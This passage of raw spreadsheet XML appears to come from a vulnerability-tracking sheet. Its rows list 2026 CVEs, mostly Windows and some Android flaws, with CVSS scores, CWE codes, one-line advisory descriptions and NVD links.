t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t></is></c></row><row r="361"><c r="A361" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B361" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C361" s="5" t="inlineStr"><is><t>CVE-2026-86720</t></is></c><c r="D361" s="5" t="n"><v>8.1</v></c><c r="E361" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G361" s="5" t="inlineStr" /><c r="H361" s="5" t="n"><v>0.003</v></c><c r="I361" s="5" t="inlineStr" /><c r="J361" s="5" t="inlineStr" /><c r="K361" s="5" t="inlineStr" /><c r="L361" s="5" t="inlineStr" /><c r="M361" s="5" t="inlineStr" /><c r="N361" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P361" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q361" s="5" t="inlineStr" /><c r="R361" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S361" s="5" t="inlineStr"><is><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is></c><c r="T361" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t></is></c></row><row r="362"><c r="A362" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B362" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C362" s="5" t="inlineStr"><is><t>CVE-2026-86723</t></is></c><c r="D362" s="5" t="n"><v>8.1</v></c><c r="E362" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G362" s="5" t="inlineStr" /><c r="H362" s="5" t="n"><v>0.003</v></c><c r="I362" s="5" t="inlineStr" /><c r="J362" s="5" t="inlineStr" /><c r="K362" s="5" t="inlineStr" /><c r="L362" s="5" t="inlineStr" /><c r="M362" s="5" t="inlineStr" /><c r="N362" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P362" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q362" s="5" t="inlineStr" /><c r="R362" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S362" s="5" t="inlineStr"><is><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is></c><c r="T362" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t></is></c></row><row r="363"><c r="A363" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B363" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C363" s="5" t="inlineStr"><is><t>CVE-2026-28662</t></is></c><c r="D363" s="5" t="n"><v>8</v></c><c r="E363" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F363" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G363" s="5" t="inlineStr" /><c r="H363" s="5" t="n"><v>0.001</v></c><c r="I363" s="5" t="inlineStr" /><c r="J363" s="5" t="inlineStr" /><c r="K363" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L363" s="5" t="inlineStr" /><c r="M363" s="5" t="inlineStr" /><c r="N363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P363" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q363" s="5" t="inlineStr" /><c r="R363" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S363" s="5" t="inlineStr"><is><t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T363" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t></is></c></row><row r="364"><c r="A364" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C364" s="5" t="inlineStr"><is><t>CVE-2026-55277</t></is></c><c r="D364" s="5" t="n"><v>8</v></c><c r="E364" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F364" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G364" s="5" t="inlineStr" /><c r="H364" s="5" t="n"><v>0.001</v></c><c r="I364" s="5" t="inlineStr" /><c r="J364" s="5" t="inlineStr" /><c r="K364" s="5" t="inlineStr" /><c r="L364" s="5" t="inlineStr" /><c r="M364" s="5" t="inlineStr" /><c r="N364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q364" s="5" t="inlineStr" /><c r="R364" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S364" s="5" t="inlineStr"><is><t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T364" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t></is></c></row><row r="365"><c r="A365" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B365" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C365" s="5" t="inlineStr"><is><t>CVE-2026-68827</t></is></c><c r="D365" s="5" t="n"><v>8</v></c><c r="E365" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F365" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G365" s="5" t="inlineStr" /><c r="H365" s="5" t="n"><v>0.004</v></c><c r="I365" s="5" t="inlineStr" /><c r="J365" s="5" t="inlineStr" /><c r="K365" s="5" t="inlineStr" /><c r="L365" s="5" t="inlineStr" /><c r="M365" s="5" t="inlineStr" /><c r="N365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O365" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P365" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q365" s="5" t="inlineStr" /><c r="R365" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S365" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T365" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t></is></c></row><row r="366"><c r="A366" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C366" s="5" t="inlineStr"><is><t>CVE-2026-68834</t></is></c><c r="D366" s="5" t="n"><v>8</v></c><c r="E366" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F366" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G366" s="5" t="inlineStr" /><c r="H366" s="5" t="n"><v>0.006</v></c><c r="I366" s="5" t="inlineStr" /><c r="J366" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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6" s="5" t="inlineStr" /><c r="M366" s="5" t="inlineStr" /><c r="N366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P366" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q366" s="5" t="inlineStr" /><c r="R366" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S366" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T366" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t></is></c></row><row r="367"><c r="A367" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C367" s="5" t="inlineStr"><is><t>CVE-2026-68838</t></is></c><c r="D367" s="5" t="n"><v>8</v></c><c r="E367" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F367" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G367" s="5" t="inlineStr" /><c r="H367" s="5" t="n"><v>0.004</v></c><c r="I367" s="5" t="inlineStr" /><c r="J367" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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7" s="5" t="inlineStr" /><c r="M367" s="5" t="inlineStr" /><c r="N367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P367" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q367" s="5" t="inlineStr" /><c r="R367" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S367" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T367" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t></is></c></row><row r="368"><c r="A368" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C368" s="5" t="inlineStr"><is><t>CVE-2026-68876</t></is></c><c r="D368" s="5" t="n"><v>8</v></c><c r="E368" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F368" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G368" s="5" t="inlineStr" /><c r="H368" s="5" t="n"><v>0.007</v></c><c r="I368" s="5" t="inlineStr" /><c r="J368" s="5" t="inlineStr" /><c r="K368" s="5" t="inlineStr" /><c r="L368" s="5" t="inlineStr" /><c r="M368" s="5" t="inlineStr" /><c r="N368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P368" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q368" s="5" t="inlineStr" /><c r="R368" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S368" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T368" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t></is></c></row><row r="369"><c r="A369" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C369" s="5" t="inlineStr"><is><t>CVE-2026-68878</t></is></c><c r="D369" s="5" t="n"><v>8</v></c><c r="E369" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F369" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G369" s="5" t="inlineStr" /><c r="H369" s="5" t="n"><v>0.005</v></c><c r="I369" s="5" t="inlineStr" /><c r="J369" s="5" t="inlineStr" /><c r="K369" s="5" t="inlineStr" /><c r="L369" s="5" t="inlineStr" /><c r="M369" s="5" t="inlineStr" /><c r="N369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P369" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q369" s="5" t="inlineStr" /><c r="R369" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S369" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T369" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t></is></c></row><row r="370"><c r="A370" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B370" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C370" s="5" t="inlineStr"><is><t>CVE-2026-68880</t></is></c><c r="D370" s="5" t="n"><v>8</v></c><c r="E370" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F370" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G370" s="5" t="inlineStr" /><c r="H370" s="5" t="n"><v>0.004</v></c><c r="I370" s="5" t="inlineStr" /><c r="J370" s="5" t="inlineStr" /><c r="K370" s="5" t="inlineStr" /><c r="L370" s="5" t="inlineStr" /><c r="M370" s="5" t="inlineStr" /><c r="N370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O370" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P370" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q370" s="5" t="inlineStr" /><c r="R370" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S370" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T370" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t></is></c></row><row r="371"><c r="A371" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C371" s="5" t="inlineStr"><is><t>CVE-2026-68894</t></is></c><c r="D371" s="5" t="n"><v>8</v></c><c r="E371" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F371" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G371" s="5" t="inlineStr" /><c r="H371" s="5" t="n"><v>0.006</v></c><c r="I371" s="5" t="inlineStr" /><c r="J371" s="5" t="inlineStr" /><c r="K371" s="5" t="inlineStr" /><c r="L371" s="5" t="inlineStr" /><c r="M371" s="5" t="inlineStr" /><c r="N371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P371" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q371" s="5" t="inlineStr" /><c r="R371" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S371" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T371" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t></is></c></row><row r="372"><c r="A372" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C372" s="5" t="inlineStr"><is><t>CVE-2026-69271</t></is></c><c r="D372" s="5" t="n"><v>8</v></c><c r="E372" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F372" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G372" s="5" t="inlineStr" /><c r="H372" s="5" t="n"><v>0.007</v></c><c r="I372" s="5" t="inlineStr" /><c r="J372" s="5" t="inlineStr" /><c r="K372" s="5" t="inlineStr" /><c r="L372" s="5" t="inlineStr" /><c r="M372" s="5" t="inlineStr" /><c r="N372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q372" s="5" t="inlineStr" /><c r="R372" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S372" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T372" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t></is></c></row><row r="373"><c r="A373" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C373" s="5" t="inlineStr"><is><t>CVE-2026-69301</t></is></c><c r="D373" s="5" t="n"><v>8</v></c><c r="E373" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F373" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G373" s="5" t="inlineStr" /><c r="H373" s="5" t="n"><v>0.008</v></c><c r="I373" s="5" t="inlineStr" /><c r="J373" s="5" t="inlineStr" /><c r="K373" s="5" t="inlineStr" /><c r="L373" s="5" t="inlineStr" /><c r="M373" s="5" t="inlineStr" /><c r="N373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P373" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q373" s="5" t="inlineStr" /><c r="R373" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S373" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T373" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t></is></c></row><row r="374"><c r="A374" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C374" s="5" t="inlineStr"><is><t>CVE-2026-69322</t></is></c><c r="D374" s="5" t="n"><v>8</v></c><c r="E374" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F374" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G374" s="5" t="inlineStr" /><c r="H374" s="5" t="n"><v>0.007</v></c><c r="I374" s="5" t="inlineStr" /><c r="J374" s="5" t="inlineStr" /><c r="K374" s="5" t="inlineStr" /><c r="L374" s="5" t="inlineStr" /><c r="M374" s="5" t="inlineStr" /><c r="N374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P374" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q374" s="5" t="inlineStr" /><c r="R374" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S374" s="5" t="inlineStr"><is><t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T374" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t></is></c></row><row r="375"><c r="A375" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C375" s="5" t="inlineStr"><is><t>CVE-2026-69332</t></is></c><c r="D375" s="5" t="n"><v>8</v></c><c r="E375" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F375" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G375" s="5" t="inlineStr" /><c r="H375" s="5" t="n"><v>0.007</v></c><c r="I375" s="5" t="inlineStr" /><c r="J375" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K37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75" s="5" t="inlineStr" /><c r="M375" s="5" t="inlineStr" /><c r="N375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P375" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q375" s="5" t="inlineStr" /><c r="R375" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S375" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T375" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t></is></c></row><row r="376"><c r="A376" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C376" s="5" t="inlineStr"><is><t>CVE-2026-69346</t></is></c><c r="D376" s="5" t="n"><v>8</v></c><c r="E376" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F376" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G376" s="5" t="inlineStr" /><c r="H376" s="5" t="n"><v>0.007</v></c><c r="I376" s="5" t="inlineStr" /><c r="J376" s="5" t="inlineStr" /><c r="K376" s="5" t="inlineStr" /><c r="L376" s="5" t="inlineStr" /><c r="M376" s="5" t="inlineStr" /><c r="N376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P376" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q376" s="5" t="inlineStr" /><c r="R376" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S376" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T376" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t></is></c></row><row r="377"><c r="A377" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C377" s="5" t="inlineStr"><is><t>CVE-2026-69365</t></is></c><c r="D377" s="5" t="n"><v>8</v></c><c r="E377" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F377" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G377" s="5" t="inlineStr" /><c r="H377" s="5" t="n"><v>0.007</v></c><c r="I377" s="5" t="inlineStr" /><c r="J377" s="5" t="inlineStr" /><c r="K377" s="5" t="inlineStr" /><c r="L377" s="5" t="inlineStr" /><c r="M377" s="5" t="inlineStr" /><c r="N377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P377" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q377" s="5" t="inlineStr" /><c r="R377" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S377" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T377" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t></is></c></row><row r="378"><c r="A378" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C378" s="5" t="inlineStr"><is><t>CVE-2026-69371</t></is></c><c r="D378" s="5" t="n"><v>8</v></c><c r="E378" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F378" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G378" s="5" t="inlineStr" /><c r="H378" s="5" t="n"><v>0.007</v></c><c r="I378" s="5" t="inlineStr" /><c r="J378" s="5" t="inlineStr" /><c r="K378" s="5" t="inlineStr" /><c r="L378" s="5" t="inlineStr" /><c r="M378" s="5" t="inlineStr" /><c r="N378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P378" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q378" s="5" t="inlineStr" /><c r="R378" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S378" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t></is></c></row><row r="379"><c r="A379" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C379" s="5" t="inlineStr"><is><t>CVE-2026-69412</t></is></c><c r="D379" s="5" t="n"><v>8</v></c><c r="E379" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F379" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G379" s="5" t="inlineStr" /><c r="H379" s="5" t="n"><v>0.005</v></c><c r="I379" s="5" t="inlineStr" /><c r="J379" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K379" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L379" s="5" t="inlineStr" /><c r="M379" s="5" t="inlineStr" /><c r="N379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P379" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q379" s="5" t="inlineStr" /><c r="R379" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S379" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="T379" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t></is></c></row><row r="380"><c r="A380" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C380" s="5" t="inlineStr"><is><t>CVE-2026-69418</t></is></c><c r="D380" s="5" t="n"><v>8</v></c><c r="E380" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F380" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G380" s="5" t="inlineStr" /><c r="H380" s="5" t="n"><v>0.007</v></c><c r="I380" s="5" t="inlineStr" /><c r="J380" s="5" t="inlineStr" /><c r="K380" s="5" t="inlineStr" /><c r="L380" s="5" t="inlineStr" /><c r="M380" s="5" t="inlineStr" /><c r="N380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P380" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q380" s="5" t="inlineStr" /><c r="R380" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S380" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T380" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t></is></c></row><row r="381"><c r="A381" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C381" s="5" t="inlineStr"><is><t>CVE-2026-69423</t></is></c><c r="D381" s="5" t="n"><v>8</v></c><c r="E381" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F381" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G381" s="5" t="inlineStr" /><c r="H381" s="5" t="n"><v>0.007</v></c><c r="I381" s="5" t="inlineStr" /><c r="J381" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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81" s="5" t="inlineStr" /><c r="M381" s="5" t="inlineStr" /><c r="N381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P381" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q381" s="5" t="inlineStr" /><c r="R381" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S381" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T381" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t></is></c></row><row r="382"><c r="A382" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C382" s="5" t="inlineStr"><is><t>CVE-2026-69427</t></is></c><c r="D382" s="5" t="n"><v>8</v></c><c r="E382" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F382" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G382" s="5" t="inlineStr" /><c r="H382" s="5" t="n"><v>0.007</v></c><c r="I382" s="5" t="inlineStr" /><c r="J382" s="5" t="inlineStr" /><c r="K382" s="5" t="inlineStr" /><c r="L382" s="5" t="inlineStr" /><c r="M382" s="5" t="inlineStr" /><c r="N382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P382" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q382" s="5" t="inlineStr" /><c r="R382" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S382" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T382" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t></is></c></row><row r="383"><c r="A383" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C383" s="5" t="inlineStr"><is><t>CVE-2026-69458</t></is></c><c r="D383" s="5" t="n"><v>8</v></c><c r="E383" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F383" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G383" s="5" t="inlineStr" /><c r="H383" s="5" t="n"><v>0.007</v></c><c r="I383" s="5" t="inlineStr" /><c r="J383" s="5" t="inlineStr" /><c r="K383" s="5" t="inlineStr" /><c r="L383" s="5" t="inlineStr" /><c r="M383" s="5" t="inlineStr" /><c r="N383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P383" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q383" s="5" t="inlineStr" /><c r="R383" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c 